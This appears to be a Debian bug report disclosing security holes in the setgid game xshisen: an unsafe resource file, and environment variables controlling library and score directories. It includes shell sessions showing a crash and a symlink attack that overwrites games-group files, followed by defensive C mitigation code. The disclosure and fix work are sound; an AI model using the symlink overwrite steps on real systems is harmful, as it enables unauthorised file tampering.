Package: xshisen
Version: 1.51-1-1.1
Severity: grave
Tags: security

I've noticed a few more interesting things in xshisen that might let it be exploited to get gid games and similar fun. I haven't exploited all of these and I don't know if they all really _are_ exploitable. This is just the result of a little 10 minute audit I did to get some idea of whether xshisen is likely to have more unfixed security holes besides the most recent set of three.
1. Unsafe resource file reading.
rcfile = new char [strlen(home) + 12];
sprintf(rcfile, "%s/.xshisenrc", home);
rdb2 = XrmGetFileDatabase(rcfile);
Here it loads up ~/.xshisenrc using XrmGetFileDatabase. Since this file
is in the user's home directory, it can be replaced by the user with
arbitrary content. According to the man page for XrmGetFileDatabase,
"the database that results from reading a file with incorrect syntax is
implementation-dependent." Since this function's behavior on corrupted
resource files is undefined, it seems likely that one might be able to
at least crash xshisen with such a file, and possibly run shellcode.
Partial proof of concept:
[EMAIL PROTECTED]:~>cp =ls .xshisen
[EMAIL PROTECTED]:~>xshisen
Warning: Missing charsets in String to FontSet conversion
zsh: segmentation fault xshisen
Whether this is truly exploitable, I don't know.
2. Unsafe XSHISENLIB environment variable.
if ((lib_directory = getenv("XSHISENLIB")) == NULL)
lib_directory = globRes.libDir;
Here it lets an environment variable control the lib directory that
xpm files are read from. These files are read by XpmReadFileToPixmap.
I don't know if that library function can be exploited by broken xpm
files, but any bug in it has the potential to be exploited via xshisen.
3. Unsafe XSHISENDAT environment variable.
if ((dat_directory = getenv("XSHISENDAT")) == NULL)
dat_directory = debscoredir;
Here it lets an environment variable control the directory it uses to write
the global high score file. So you just point a symlink to a file you'd
like to overwrite and redirect the XSHISENDAT to that directory:
[EMAIL PROTECTED]:~>echo hi > file
[EMAIL PROTECTED]:~>ls -l xshisen.scores
lrwxrwxrwx 1 joey joey 4 Jan 24 16:05 xshisen.scores -> file
[EMAIL PROTECTED]:~>XSHISENDAT=. xshisen
Warning: Missing charsets in String to FontSet conversion
[here I finished a game in click trial mode]
[EMAIL PROTECTED]:~>head file
hi
joey (Joey Hess) X1.51 00:01:45 05-01-24 16:07:40
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
X1.51 99:99:99 00-00-00 00:00:00
Like bug #291613, this symlink attack allows (over)writing files owned by
group games.
There's also the possibility of providing a xshisen.scores file
that overflows a buffer or something in the code that reads the high score
file. I don't see any overflows in that code offhand, but I didn't look very
hard.
My gut feeling after this little audit is that xshisen is not written
securely and should not be made setgid on a modern unix system. The
easiest fix seems to me to be removing the global high score file and
removing the sgid bit.
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.4.27
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Versions of packages xshisen depends on:
ii libc6 2.3.2.ds1-20 GNU C Library: Shared libraries an
ii libgcc1 1:3.4.3-7 GCC support library
ii libice6 4.3.0.dfsg.1-10 Inter-Client Exchange library
ii libsm6 4.3.0.dfsg.1-10 X Window System Session Management
ii libstdc++5 1:3.3.5-6 The GNU Standard C++ Library v3
ii libx11-6 4.3.0.dfsg.1-10 X Window System protocol client li
ii libxaw7 4.3.0.dfsg.1-10 X Athena widget set library
ii libxmu6 4.3.0.dfsg.1-10 X Window System miscellaneous util
ii libxpm4 4.3.0.dfsg.1-10 X pixmap library
ii libxt6 4.3.0.dfsg.1-10 X Toolkit Intrinsics
ii xlibs 4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu
-- no debconf information
--
see shy jo
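The environment-controlled directories in points 2 and 3 and the symlink overwrite in point 3 have simple defensive counterparts. The following C is an added example, not xshisen's code; the names pick_dir, open_score_file, DEFAULT_SCORE_DIR and demo_symlink_refused are hypothetical, and it assumes a Linux open(2), which reports ELOOP when O_NOFOLLOW meets a symlink.

```c
/* Added example, not xshisen's code: a privilege-aware directory choice
 * (points 2 and 3) and a symlink-refusing score-file open (point 3). */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
const char *DEFAULT_SCORE_DIR = "/var/games";   /* placeholder default */
/* Ignore an environment-supplied directory when running setgid/setuid
 * (effective ids differ from real ids) or when it is not an absolute path. */
const char *pick_dir(const char *env_val, const char *default_dir)
{
    int privileged = getgid() != getegid() || getuid() != geteuid();
    return (privileged || !env_val || env_val[0] != '/') ? default_dir : env_val;
}
/* Open <dir>/xshisen.scores for append; O_NOFOLLOW makes a symlink at the
 * last component fail (ELOOP on Linux) and fstat rejects non-regular files. */
int open_score_file(const char *dir)
{
    char path[4096];
    struct stat st;
    if (snprintf(path, sizeof path, "%s/xshisen.scores", dir) >= (int)sizeof path)
        return -1;
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW);
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))) { close(fd); return -1; }
    return fd;
}
/* Rebuilds the report's setup in a scratch dir ("file" plus the symlink
 * xshisen.scores -> file). Returns 1 if the symlink is refused with ELOOP
 * and a real xshisen.scores still opens afterwards, 0 otherwise. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/xshisenXXXXXX", target[4200], link[4200];
    int ok = 0, fd;
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/file", dir);
    snprintf(link, sizeof link, "%s/xshisen.scores", dir);
    fd = open(target, O_WRONLY | O_CREAT, 0644);
    if (fd >= 0 && close(fd) == 0 && symlink("file", link) == 0) {
        fd = open_score_file(dir);              /* through symlink: refused */
        ok = fd < 0 && errno == ELOOP;
        if (ok && rename(target, link) == 0) {  /* replace link with real file */
            ok = (fd = open_score_file(dir)) >= 0;
            if (fd >= 0) close(fd);
        }
    }
    unlink(link); unlink(target); rmdir(dir);
    return ok;
}
```

With pick_dir, the report's `XSHISENDAT=.` is ignored even for an unprivileged run because "." is not absolute; under setgid any value is ignored.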